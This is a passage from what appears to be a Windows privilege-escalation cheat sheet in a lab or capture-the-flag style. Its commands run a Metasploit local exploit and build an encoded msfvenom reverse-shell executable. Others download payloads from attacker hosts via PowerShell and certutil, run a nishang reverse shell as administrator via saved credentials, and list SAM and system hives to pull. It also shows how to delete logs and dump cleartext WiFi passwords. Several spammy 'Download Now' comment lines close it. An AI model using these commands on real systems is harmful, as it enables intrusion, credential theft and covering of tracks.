background
*********** use exploit/local/EXPLPOIT-SUGGESTED************
set lport 9004
set lhost 10.10.14.6
run
getuid
Transfer Files Using FTP Service
echo open 10.10.14.19>ftp_commands.txt&echo anonymous>>ftp_commands.txt&echo password>>ftp_commands.txt&echo binary>>ftp_commands.txt&echo get ms15.exe>>ftp_commands.txt&echo bye>>ftp_commands.txt&ftp -s:ftp_commands.txt
python -m pyftpdlib -p 21
Transfer Files & Getting Root Shell
powershell -Command (new-object System.Net.WebClient).Downloadfile('http://10.10.12.61:8001/shell.exe', 'shell.exe')
Create Exploit:
msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=10.10.12.61 LPORT=31337 -e x86/shikata_ga_nai -f exe -o shell.exe
python -m SimplerHTTPServer 8001
dir | findstr shell
runas /user:Administrator /noprofile /savecred "cmd.exe /c shell.exe
Transfer Files & Getting Root Shell
Building the Payload:
/usr/share/nishang/Shells/Invoke-PowershellTcp.ps1
already available on kali, if not Download from here.
echo "Invoke-PowerShellTcp -Reverse -IPAddress XX.XX.XX.XX -Port 9001 >> Invoke-PowershellTcp.ps1
python -m SimpleHTTPServer 8001
or
webup 8001
Transferring the Payload:
cd C:\Users\security\AppData\Local\Temp\
certutil -f split -urlcache http://10.10.14.2:8001/Invoke_powershellTcp.ps1
Run As Admin:
runas /user:ACCESS\administrator /savecred "powershell -ExecutionPolicy Bypass -File C:\Users\security\AppData\Local\Temp\Invoke-PowerShellTcp.ps1"
nc nvlp 9001
Files
type %SYSTEMDRIVE%\boot.ini type %WINDIR%\win.ini type %WINDIR%\System32\drivers\etc\hosts
Files to Pull
%SYSTEMDRIVE%\pagefile.sys %WINDIR%\debug\NetSetup.log %WINDIR%\repair\sam %WINDIR%\repair\system %WINDIR%\repair\software, %WINDIR%\repair\security %WINDIR%\iis6.log %WINDIR%\system32\config\AppEvent.Evt %WINDIR%\system32\config\SecEvent.Evt %WINDIR%\system32\config\default.sav %WINDIR%\system32\config\security.sav %WINDIR%\system32\config\software.sav %WINDIR%\system32\config\system.sav %WINDIR%\system32\CCM\logs\*.log %USERPROFILE%\ntuser.dat %USERPROFILE%\LocalS~1\Tempor~1\Content.IE5\index.dat %WINDIR%\System32\drivers\etc\hosts
Host Information
systeminfo driverquery tasklist fsutil fsinfo drives set qwinsta net time net file net session net use
If you are looking for kernal exploit targets, you can try using findstr like so…
driverquery | findstr Kernel
Query a specific service:
sc query <SERVICE NAME>
Start a service:
sc start <SERVICE NAME>
Stop a service:
sc stop <SERVICE NAME>
Kill a Task
taskkill f /pid 1337
List System Logs
wevtutil el
Delete Logs
del \*.log /a /s /q /f
Scheduled Tasks
schtasks /query /fo LIST /v
Installed Software
wmic product get name /value
Uninstall Software
wmic product where name="<NAME>" call uninstall /INTERACTIVE:OFF
Search for Keywords (e.g *pass)
dir /s *pass* == *key* == *vnc* == *.config*
The above also looks for key, vnc and config.
Only in certain files…
findstr /si pass *.xml *.ini *.txt
WiFi Clear Text Passwords
Find AP SSID
netsh wlan show profile
Get Cleartext Pass
netsh wlan show profile <SSID> key=clear
Windows Priv Escallation >>>>> Download Now
ReplyDelete>>>>> Download Full
Windows Priv Escallation >>>>> Download LINK
>>>>> Download Now
Windows Priv Escallation >>>>> Download Full
>>>>> Download LINK O9